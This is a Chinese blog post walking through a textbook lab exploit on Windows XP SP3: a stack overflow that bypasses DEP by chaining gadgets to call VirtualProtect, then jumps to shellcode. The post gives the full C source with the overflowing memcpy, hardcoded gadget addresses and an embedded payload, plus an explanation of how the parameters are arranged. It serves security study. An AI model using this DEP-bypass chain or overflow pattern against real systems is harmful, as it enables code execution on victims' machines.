0day2 挑战DEP,ret2libc利用VirtualProtect详细实现

于 2020-11-03 13:33:35 发布
阅读量301 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45612751/article/details/109462876
本文介绍如何使用ret2libc技术改变内存属性,绕过Data Execution Prevention(DEP)保护,使栈空间可执行代码。通过具体实例展示了VirtualProtect函数的参数设置过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0day2 挑战DEP,ret2libc利用VirtualProtect详细实现

本文参考于 0day安全:软件漏洞分析技术(第2版)
此方法是利用ret2libc来改变内存属性,使栈空间可以执行命令
实验环境 windows xp sp3,vc6.0,仅开启dep,OD调试器;
代码如下:

// GS_Virtual.cpp : 定义控制台应用程序的入口点。
//

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\xd0\xdb\xce\x7d"//pop eax retn
"\x57\x4c\x5F\x7d"//pop pop pop retn
"\x95\x8b\x1d\x5d"//修正EBP
"\xbe\x0d\xfc\x7f"//RETN
"\x90\x90\x90\x90"
"\xb8\xdd\xeb\x77"//push esp jmp eax
"\xFF\x00\x00\x00"
"\x40\x00\x00\x00"
"\xb8\xdd\xeb\x77"//push esp jmp eax
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\xd9\x1a\x80\x7C"//修改内存属性
"\x90\x90\x90\x90"
"\xAb\x8f\xd3\x7d"//jmp esp
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
;
void test()
{
	char tt[176];
	memcpy(tt,shellcode,420);
}
int main()
{
	HINSTANCE hInst = LoadLibrary("shell32.dll");
	char temp[200];
	test();
    return 0;
}

VirtualProtect参数

HRESULT VirtualProtect (  
    [in]  void*   lpAddress,  //指向要更改其保护属性的虚拟内存基址的指针
    [in]  SIZE_T  dwSize,  //要更改的内存页区域的大小(以字节为单位)
    [in]  DWORD   flNewProtect,  //要应用的内存保护的类型
    [out] DWORD*  pflOldProtect  //指向上一个内存保护值的指针
);

在这里插入图片描述
由函数流程可知ebp+8到ebp+14保存着需要构造的参数,ebp+c和ebp+10是固定的,而ebp+8和ebp+14是需要动态确定的。
首先,我们需要修复ebp,利用push esp,pop ebp,retn 4指令。

在这里插入图片描述
执行完命令后,esp会指向ebp+8,利用retn指令使esp向高地址移动,再push esp,jmp eax就可以将ebp+8赋为esp,接着只要确定ebp+14的值。由于有jmp eax,因此可将eax设为pop,pop,pop,retn的地址,使执行后esp指向ebp+18,再利用push esp,jmp eax命令确定ebp+14的值。至此,动态地址已经布置完成,只要再写入两个固定参数到ebp+c,ebp+10,即0xff,0x40,至此内存属性已修改完毕,加入jmp esp即可。

调用virtualprotect函数
在这里插入图片描述
参数布置完成
参数完成

最后根据virtualprotect最后的retn 10,进行填充后,即可布置shellcode。

参考于:0day安全:软件漏洞分析技术(第2版)

小滢滢xyy
关注
利用Ret2Libc挑战DEP之二——利用VirtualProtect
Yx0051的博客
08-14 961
感觉最近作者给出的shellcode,有一种“他就是这样”、“这样的shellcode是最合理”的感觉了。刚开始看有点看不懂,但是跟着最终实现代码一点点跟,就会发现这个代码的巧妙之处。 0x01 环境 系统:Windows 2003 SP2 编译器:VS2008 注意编译选项: release版本 禁用优化(C++——optimization disable) GS禁用(C++——c
利用Ret2Libc挑战DEP——利用ZwSetInformationProcess
Yx0051的博客
08-09 1302
终于看到著名的DEP机制了,今天可以好好的研究它了! DEP基本原理就是数据所在内存页标识为不可执行,这样就导致一个问题,就是我们之前所有的实验都建立在一个基础上:shellcode的执行是位于堆或者栈上的,我们通过覆盖上面的正常数据,将可执行的恶意数据放在上面进行程序流程劫持。后来,微软的程序员就发现了这个致命的漏洞,就创建了这个机制:从XP SP2开始,CPU一旦检测到在非可执行区域执行指令
Ret2libc 利用 VitualProtect
weixin_30790841的博客
03-19 166
DEP 概念 首先 WINDOWS 2003 是默认开启DEP的 一般都拿2003来做试验 今天我用 XP 开启DEP 做实验 一回事 ······················································· 只是学习笔记·····································另外的方法: Ret2libc ...
DEP: Ret2Libc via VirtualProtect()
ShadowAssassin的专栏
01-05 1104
VirtualProtect() 绕过DEP 文章参考 0day 安全:软件漏洞分析技术: 学习了DEP 绕过技术中的 VirtualProtect()绕过DEP,不过书中的例子是以windows 2003 为例,通过学习,一步一步在xp上测试成功。 BOOL VirtualProtect{ LPVOID lpAddress, // 需要修改属性的内存的起始地址
(转)VirtualProtect、VirtualLock、VirtualUnlock
gxj1680的专栏
03-16 1655
VirtualProtect改变指定虚拟内存分页的保护属性,函数原型如下: BOOL VirtualProtect(     LPVOID lpAddress,     SIZE_T  dwSize,     DWORD flNewProtect,     PDWORD lpflOldProtect); 参数: lpAddress: 输入参数,虚拟内存基地址。
内存保护机制及绕过方法——利用Ret2Libc绕过DEPVirtualProtect函数
weixin_30549175的博客
05-14 972
利用Ret2Libc绕过DEPVirtualProtect函数 ⑴. 原理分析: i.相关概念: VirtualProtect()函数: BOOL WINAPI VirtualProtect( _In_ LPVOID lpAddress, //目标地址的起始位置 _In_ SIZE_T dwSize, //区域大小 _In_ DWORD flN...
0day 第12章--12.3.3 Ret2Libc实战之利用VirtualAlloc
I have a dream
04-08 487
实验环境: Winxp sp3 VS2010 实验配置: 禁用优化、关闭GS、关闭safeseh、开启DEP 思路:当程序需要一段可执行内存时,可以通过kernel32.dll的VirtualAlloc申请一段具有可执行属性的内存。因此可通过利用此函数将shellcode复制到申请的内存空间中,以绕过DEP。 如何利用? 将返回地址覆盖为VirtualAlloc的地址,参数输入进去即可。 ...
0day安全》——数据与程序的分水岭:DEP
sunr_的博客
08-31 642
DEP机制的保护原理 溢出攻击的根源在于区分不了代码与数据。 DEP 的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入 shellcode 时,程序会尝试在数据页面上执行指令,此时 CPU 就会抛出异常,而不是去执行恶意指令。 DEP 的主要作用是阻止数据页(如默认的堆页、各种堆栈页以及内存池页)执行代码。微软从 Windows XP SP2 开始提供这种技术支持,根据实现的机制不同可分为:软件 DEP( Software DEP)和硬件 DEP( Hardware-enforced DEP
福昕阅读器 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow
太阳风的专栏
11-06 5480
之前在 ISCC2013 线上赛的时候,这个溢出题没能做出来,现在正好在学习溢出,想重现下漏洞。 http://www.exploit-db.com/exploits/23944/ exploit-db 上有简略的描述 测试环境: Microsoft Windows 7 sp1 Mozilla Firefox 17.0.1 Foxit Reader 5.4.3.0920
VirtualProtect()
windroid.xyz
01-02 6780
VirtualProtect 改变调用进程的一段页的保护属性。要改变其他进程,请使用 VirtualProtectEx 函数。 BOOL WINAPI VirtualProrect( __in    LPVOID lpAddress , __in    SIZE_T dwSize , __in    DWORD flNewProtect , __out  PDWORD lpfl
bypass_virtual_protect
04-25
如果应用于游戏(例如游戏驱动保护hook了VirtualProtect函数)时,若采用标记TYPE_COW(test工程中的宏定义)会被游戏的CRC检测到,则使用TYPE_WRITE修改内存(被修改内存的地址若被CRC,请自行绕过,不在本例范围内)
hook VirtualProtect And VirtualAlloc
01-19
hook VirtualProtect And VirtualAlloc
Ret2Libc 练习(2) -- VirtualProtect
weixin_30700977的博客
09-27 221
  这几天做了NSCTF和GCTF,耽误了几天,今天继续。   这次绕过DEP的方法是利用VirtualProtect函数将shellcode所在的内存属性改成可执行状态就可以绕过DEP了。   首先看一下VirtualProtect函数的参数说明:      lpAddress: 改变属性的内存起始起止   dwSize: 要改变属性的内存的起始地址   flNewProtect: ...
游戏异常处理(转)
08-31 597
如何定位导致Crash的代码位置 (转)VC调试入门 游戏异常处理(转)技术类   2009-05-31 18:10   阅读24   评论0   字号: 大大  中中  小小  1.      前言 几 乎每个游戏都或多或少地存在着缺陷,辛辛苦苦完成的游戏要是最终在玩家那里崩溃了,对开发人员来说可能是
VirtualProtect
weixin_41454036的博客
09-07 820
VirtualProtect,是对应 Win32 函数的逻辑包装函数,它会在呼叫处理程序的虚拟位置空间里,变更认可页面区域上的保护。 lpAddress [in] 指针,指向要变更保护属性的内存基址。 dwSize [in] 要变更的记忆体分页区域的大小 (单位是字节)。但是需要注意,页面边界2字节的内存属性更改,有可能导致改变2个页的属性同时被改变 flNewProtect [in] 要套用的记忆体保护类型。 lpflOldProtect [out] 上一个记忆体保护值的指针。 ...
virtualProtect
weixin_30505225的博客
03-29 574
// VirtualProtect.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include "windows.h" typedef void (*FUN)(); FUN fun = NULL; int _tmain(int argc, _TCHAR* argv[]) { char* p2 = "Helloworl...
virtualProtect函数
weixin_34348111的博客
06-04 783
原文链接:https://blog.csdn.net/zacklin/article/details/7478118 结合逆向课件11 转载于:https://www.cnblogs.com/qy-blogs/p/9134114.html
VirtualProtect,是对应 Win32 函数的逻辑包装函数,它会在呼叫处理程序的虚拟位址空间里,变更认可页面区域上的保护。
thanklife的专栏
04-18 1293
VirtualProtect VirtualProtect,是对应 Win32 函数的逻辑包装函数,它会在呼叫处理程序的虚拟位址空间里,变更认可页面区域上的保护。 目录 1 方法 ▪ 传回值 ▪ 描述 ▪ 备注 2 访问类型 方法 当做对应之 Win32 函数的逻辑包装函数。VirtualProtect 的 Win32 实作会在呼叫处理序的虚拟位址空间里,变更认可
ret2libc模板
最新发布
01-15
为了成功实施 ret2libc 攻击,通常需要满足以下几个条件: - 受影响的应用程序存在可利用的栈溢出缺陷; - 已知目标系统的 glibc 版本及其内部函数的具体位置; - 如果启用了 ASLR 地址空间布局随机化,则还需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值